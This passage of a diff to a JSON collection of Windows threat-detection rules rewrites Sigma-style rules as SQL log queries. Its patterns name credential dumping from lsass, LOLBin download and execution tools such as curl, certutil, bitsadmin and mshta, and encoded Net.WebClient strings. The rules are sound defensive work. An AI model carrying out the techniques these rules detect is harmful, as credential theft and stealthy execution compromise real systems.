"7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", "attack.execution", - "attack.defense_evasion" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", - "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "PUA - Sysinternal Tool Execution - Registry", + "id": "25ffa65d-76d8-4da5-a832-3f2b0136e133", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_add_pua_sysinternals_execution_via_eula.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", - "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "status": "test", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious Rundll32 Setupapi.dll Activity", - "id": "285b85b1-a555-4095-8652-a8a4106af63f", - "status": "test", - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "author": "Konstantin Grishchenko, oscd.community", + "title": "PUA - Sysinternals Tools Execution - Registry", + "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "status": "experimental", + "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" + "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "attack.resource_development", + "attack.t1588.002" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" - }, - { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' 